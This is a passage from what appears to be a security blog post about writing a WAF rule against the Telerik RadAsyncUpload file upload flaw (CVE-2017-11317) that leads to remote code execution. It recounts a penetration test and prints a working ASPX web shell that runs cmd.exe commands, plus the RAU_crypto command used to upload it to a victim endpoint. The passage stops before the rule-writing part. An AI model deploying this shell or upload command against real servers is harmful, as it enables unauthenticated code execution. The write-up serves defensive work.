vulnerable asset.</span></p><p cid="n5" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">This blog post goes through a real life scenario that describes the development process of the <i>WAF</i> rule created to mitigate the <i>Telerik Unrestricted File Upload </i>(</span><span class="md-meta-i-c md-link" md-inline="link" style="box-sizing: border-box;"><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11317" spellcheck="false" style="-webkit-user-drag: none; box-sizing: border-box; color: #4183c4; cursor: pointer;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">CVE-2017-11317</span></a></span><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">) vulnerability, which further led to <i>remote code execution</i> (</span><span class="md-meta-i-c md-link" md-inline="link" style="box-sizing: border-box;"><a href="https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui" spellcheck="false" style="-webkit-user-drag: none; box-sizing: border-box; color: #4183c4; cursor: pointer;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">CVE-2019-18935</span></a></span><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">).</span></p><p cid="n6" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"><br /></span></p><p cid="n6" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">In particular, after providing some <i>background</i> on the vulnerability and some <b><i>undocumented</i></b> <i><b>details</b></i> about exploitation, a technical drill down will describe all the steps of a challenging tuning process to find the right <i>Web Application Firewall</i> rule and, hopefully, block the vulnerability from being exploited.</span></p><p cid="n102" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: 
"Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;">From a defensive point of view it is important to underline that <i>WAFs</i> are powerful tools to secure assets but the development process of rules to fix vulnerabilities should not be overlooked, since <u><i>poorly engineered rules</i> are often bypassed by attackers</u>. </p><p cid="n102" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><br /></p></div><div><span class="md-plain md-expand" md-inline="plain" style="box-sizing: border-box;"><h3 cid="n8" class="md-end-block md-heading md-focus" mdtype="heading" style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; color: #333333; cursor: text; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 1.5em; line-height: 1.43; margin-bottom: 1rem; margin-top: 1rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Telerik Unrestricted File Upload Literature</span></h3><p cid="n9" class="md-end-block md-p md-focus" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Telerik RadAsyncUpload feature was initially found to be vulnerable to path traversal attacks (</span><span class="md-meta-i-c md-link" md-inline="link" style="box-sizing: border-box;"><a 
href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-2217" spellcheck="false" style="-webkit-user-drag: none; box-sizing: border-box; color: #4183c4; cursor: pointer;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">CVE-2014-2217</span></a></span><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">) allowing users to upload files to arbitrary paths.</span></p><p cid="n9" class="md-end-block md-p md-focus" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The vulnerability was then fixed by encrypting the </span><i>rauPostData</i> parameter containing the information regarding the location of the file upload. </p><p cid="n10" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">However, up until version v2017.2.621, Telerik RadAsyncUpload was configured to use a <b>hard-coded key </b>(</span><span class="md-meta-i-c md-link" md-inline="link" style="box-sizing: border-box;"><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11317" spellcheck="false" style="-webkit-user-drag: none; box-sizing: border-box; color: #4183c4; cursor: pointer;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">CVE-2017-11317</span></a></span><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">) to encrypt data in file upload requests. 
Therefore, an attacker could perform requests to the "<i>/Telerik.Web.Ui.WebResource.axd?type=rau</i>" endpoint with a custom encrypted </span><span class="md-pair-s" md-inline="em" style="box-sizing: border-box;"><em style="box-sizing: border-box;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">rauPostData</span></em></span><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"> parameter to upload arbitrary files within any directory of the web server.</span></p><p cid="n11" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Later on, researchers also found out that the </span><span class="md-pair-s" md-inline="em" style="box-sizing: border-box;"><em style="box-sizing: border-box;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">rauPostData</span></em></span><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"> was subject to <b>insecure deserialization</b> within the .NET code of Telerik since it contained the class type that was used to deserialize the object. 
</span></p><p cid="n11" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">This vulnerability led to remote code execution (</span><span class="md-meta-i-c md-link" md-inline="link" style="box-sizing: border-box;"><a href="https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui" spellcheck="false" style="-webkit-user-drag: none; box-sizing: border-box; color: #4183c4; cursor: pointer;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">CVE-2019-18935</span></a></span><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">) and is now publicly available as a </span><span class="md-meta-i-c md-link" md-inline="link" style="box-sizing: border-box;"><a href="https://github.com/noperator/CVE-2019-18935" spellcheck="false" style="-webkit-user-drag: none; box-sizing: border-box; color: #4183c4; cursor: pointer;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">tool</span></a></span><span class="md-plain md-expand" md-inline="plain" style="box-sizing: border-box;">.</span></p><div><span class="md-plain md-expand" md-inline="plain" style="box-sizing: border-box;"><h3 cid="n12" class="md-end-block md-heading" mdtype="heading" style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; color: #333333; cursor: text; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 1.5em; line-height: 1.43; margin-bottom: 1rem; margin-top: 1rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Real Life Scenario</span></h3><p cid="n13" 
class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The present article will focus on how the arbitrary file upload vulnerability (</span><span class="md-meta-i-c md-link" md-inline="link" style="box-sizing: border-box;"><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11317" spellcheck="false" style="-webkit-user-drag: none; box-sizing: border-box; color: #4183c4; cursor: pointer;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">CVE-2017-11317</span></a></span><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">) was addressed within a real life scenario.</span></p><p cid="n14" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">During a network penetration test for a client, the presence of Telerik UI was detected on a web application since it performed requests to the "<i>/Telerik.Web.UI.WebResource.axd"</i> endpoint to download JavaScript files for its UI. 
</span></p><p cid="n14" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">By analyzing some response of the application it was possible to find the string </span>"<i>2014.2.724.40</i>" in a HTML comment, <span class="md-plain" md-inline="plain" style="box-sizing: border-box;">indicating the presence of Telerik UI version </span><span class="md-meta-i-c md-link" md-inline="link" style="box-sizing: border-box;"><a href="https://www.telerik.com/support/whats-new/aspnet-ajax/release-history/ui-for-asp-net-ajax-q2-2014-sp1-(version-2014-2-724)" spellcheck="false" style="-webkit-user-drag: none; box-sizing: border-box; color: #4183c4; cursor: pointer;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">2014.2.724</span></a></span><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"> vulnerable to the mentioned CVEs.</span></p><p cid="n15" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Also, thanks to a full path disclosure vulnerability of the application it was possible to identify the path of a folder within the web root of the application.</span></p><p cid="n16" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; 
orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">It was enough to upload a malicious ".aspx" file within the web root of the application and achieve an unauthenticated remote code execution:</span></p><pre cid="n18" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="asp" mdtype="fences" spellcheck="false" style="background-attachment: inherit; background-clip: inherit; background-color: #f8f8f8; background-image: inherit; background-origin: inherit; background-position: inherit; background-repeat: inherit; background-size: inherit; border-radius: 3px; border: 1px solid rgb(231, 234, 237); box-sizing: border-box; break-inside: avoid; color: #333333; font-family: var(--monospace); font-size: 0.9em; margin-bottom: 15px; margin-top: 15px; overflow: visible; padding: 8px 4px 6px; position: relative; white-space: normal; width: inherit;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><%<span class="cm-meta" style="box-sizing: border-box; color: #555555;">@</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">Page</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">Language</span><span class="cm-operator" style="box-sizing: border-box; color: #981a1a;">=</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;">"VB"</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">Debug</span><span class="cm-operator" style="box-sizing: border-box; color: #981a1a;">=</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;">"true"</span> %></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><%<span class="cm-meta" style="box-sizing: border-box; color: #555555;">@</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">import</span> <span class="cm-variable" style="box-sizing: 
border-box; color: black;">Namespace</span><span class="cm-operator" style="box-sizing: border-box; color: #981a1a;">=</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;">"system.IO"</span> %></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><%<span class="cm-meta" style="box-sizing: border-box; color: #555555;">@</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">import</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">Namespace</span><span class="cm-operator" style="box-sizing: border-box; color: #981a1a;">=</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;">"System.Diagnostics"</span> %></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #117700;">html</span> <span class="cm-attribute" style="box-sizing: border-box; color: #0000cc;">xmlns</span>=<span class="cm-string" style="box-sizing: border-box; color: #aa1111;">"www.w3.org/1999/xhtml"</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #117700;">head</span> <span class="cm-attribute" style="box-sizing: border-box; color: #0000cc;">runat</span>=<span class="cm-string" style="box-sizing: border-box; color: #aa1111;">"server"</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;">></span></span><br /><span 
role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #117700;">title</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;">></span>Test<span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;"></</span><span class="cm-tag" style="box-sizing: border-box; color: #117700;">title</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;"></</span><span class="cm-tag" style="box-sizing: border-box; color: #117700;">head</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #117700;">body</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #117700;">form</span> <span class="cm-attribute" style="box-sizing: border-box; color: #0000cc;">id</span>=<span class="cm-string" 
style="box-sizing: border-box; color: #aa1111;">"form1"</span> <span class="cm-attribute" style="box-sizing: border-box; color: #0000cc;">runat</span>=<span class="cm-string" style="box-sizing: border-box; color: #aa1111;">"server"</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #117700;">div</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><% </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><span class="cm-variable" style="box-sizing: border-box; color: black;">Dim</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">myProcess</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">As</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">New</span> <span class="cm-def" style="box-sizing: border-box; color: blue;">Process</span>() </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: 
relative;"> </span><span class="cm-variable" style="box-sizing: border-box; color: black;">Dim</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">myProcessStartInfo</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">As</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">New</span> <span class="cm-def" style="box-sizing: border-box; color: blue;">ProcessStartInfo</span>(<span class="cm-string" style="box-sizing: border-box; color: #aa1111;">"c:\windows\system32\cmd.exe"</span>)</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><span class="cm-variable" style="box-sizing: border-box; color: black;">myProcessStartInfo</span>.<span class="cm-variable" style="box-sizing: border-box; color: black;">UseShellExecute</span> <span class="cm-operator" style="box-sizing: border-box; color: #981a1a;">=</span> <span class="cm-atom" style="box-sizing: border-box; color: #221199;">false</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><span class="cm-variable" style="box-sizing: border-box; color: black;">myProcessStartInfo</span>.<span class="cm-variable" style="box-sizing: border-box; color: black;">RedirectStandardOutput</span> <span class="cm-operator" style="box-sizing: border-box; color: #981a1a;">=</span> <span class="cm-atom" style="box-sizing: border-box; color: #221199;">true</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; 
display: inline-block; position: relative;"> </span><span class="cm-variable" style="box-sizing: border-box; color: black;">myProcess</span>.<span class="cm-variable" style="box-sizing: border-box; color: black;">StartInfo</span> <span class="cm-operator" style="box-sizing: border-box; color: #981a1a;">=</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">myProcessStartInfo</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><span class="cm-variable" style="box-sizing: border-box; color: black;">myProcessStartInfo</span>.<span class="cm-variable" style="box-sizing: border-box; color: black;">Arguments</span><span class="cm-operator" style="box-sizing: border-box; color: #981a1a;">=</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;">"/c dir"</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><span class="cm-variable" style="box-sizing: border-box; color: black;">myProcess</span>.<span class="cm-variable" style="box-sizing: border-box; color: black;">Start</span>()</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><span class="cm-variable" style="box-sizing: border-box; color: black;">Dim</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">myStreamReader</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">As</span> <span class="cm-variable" 
style="box-sizing: border-box; color: black;">StreamReader</span> <span class="cm-operator" style="box-sizing: border-box; color: #981a1a;">=</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">myProcess</span>.<span class="cm-variable" style="box-sizing: border-box; color: black;">StandardOutput</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><span class="cm-variable" style="box-sizing: border-box; color: black;">Dim</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">myString</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">As</span> <span class="cm-variable-3" style="box-sizing: border-box; color: #008855;">String</span> <span class="cm-operator" style="box-sizing: border-box; color: #981a1a;">=</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">myStreamReader</span>.<span class="cm-variable" style="box-sizing: border-box; color: black;">Readtoend</span>()</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><span class="cm-variable" style="box-sizing: border-box; color: black;">myProcess</span>.<span class="cm-variable" style="box-sizing: border-box; color: black;">Close</span>()</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><span class="cm-variable" style="box-sizing: border-box; color: black;">mystring</span><span class="cm-operator" 
style="box-sizing: border-box; color: #981a1a;">=</span><span class="cm-variable" style="box-sizing: border-box; color: black;">replace</span>(<span class="cm-variable" style="box-sizing: border-box; color: black;">mystring</span>,<span class="cm-string" style="box-sizing: border-box; color: #aa1111;">"<"</span>,<span class="cm-string" style="box-sizing: border-box; color: #aa1111;">"&lt;"</span>)</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><span class="cm-variable" style="box-sizing: border-box; color: black;">mystring</span><span class="cm-operator" style="box-sizing: border-box; color: #981a1a;">=</span><span class="cm-variable" style="box-sizing: border-box; color: black;">replace</span>(<span class="cm-variable" style="box-sizing: border-box; color: black;">mystring</span>,<span class="cm-string" style="box-sizing: border-box; color: #aa1111;">">"</span>,<span class="cm-string" style="box-sizing: border-box; color: #aa1111;">"&gt;"</span>)</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><span class="cm-variable" style="box-sizing: border-box; color: black;">Response</span>.<span class="cm-variable" style="box-sizing: border-box; color: black;">Write</span>(<span class="cm-variable" style="box-sizing: border-box; color: black;">vbcrlf</span> <span class="cm-operator" style="box-sizing: border-box; color: #981a1a;">&</span> <span class="cm-string" style="box-sizing: border-box; color: #aa1111;">"<pre>"</span> <span class="cm-operator" style="box-sizing: border-box; color: #981a1a;">&</span> <span class="cm-variable" style="box-sizing: border-box; color: 
black;">mystring</span> <span class="cm-operator" style="box-sizing: border-box; color: #981a1a;">&</span> <span class="cm-string" style="box-sizing: border-box; color: #aa1111;">"</pre>"</span>)</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span>%></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;"></</span><span class="cm-tag" style="box-sizing: border-box; color: #117700;">div</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;"></</span><span class="cm-tag" style="box-sizing: border-box; color: #117700;">form</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;"></</span><span class="cm-tag" style="box-sizing: border-box; color: #117700;">body</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: 
#117700;"></</span><span class="cm-tag" style="box-sizing: border-box; color: #117700;">html</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;">></span></span></pre><p cid="n19" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"></p><p cid="n20" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span style="font-size: 1.5em;">File Upload Exploitation</span></p><p cid="n23" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"></span></p><p cid="n20" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">In order to upload the aspx file, the </span><span class="md-meta-i-c md-link" md-inline="link" style="box-sizing: border-box;"><a href="https://github.com/bao7uo/RAU_crypto" spellcheck="false" style="-webkit-user-drag: none; box-sizing: border-box; color: #4183c4; cursor: pointer;"><span class="md-plain" md-inline="plain" style="box-sizing: 
border-box;">RAU_crypto</span></a></span><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"> tool was used to automatically create a valid file upload request encrypted with the hard-coded key of Telerik.</span></p><p cid="n24" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The tool was invoked using the following command line string:</span></p><pre cid="n25" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="" mdtype="fences" spellcheck="false" style="background-attachment: inherit; background-clip: inherit; background-color: #f8f8f8; background-image: inherit; background-origin: inherit; background-position: inherit; background-repeat: inherit; background-size: inherit; border-radius: 3px; border: 1px solid rgb(231, 234, 237); box-sizing: border-box; break-inside: avoid; color: #333333; font-family: var(--monospace); font-size: 0.9em; margin-bottom: 15px; margin-top: 15px; overflow: visible; padding: 8px 4px 6px; position: relative; white-space: normal; width: inherit;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">python RAU_crypto.py -P c:\\destination\\folder 2014.2.724 malicious.aspx http://victim.com/Telerik.Web.UI.WebResource.axd?type=rau BurpProxyHost:8080</span></pre><p cid="n26" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The command line parameters contain 
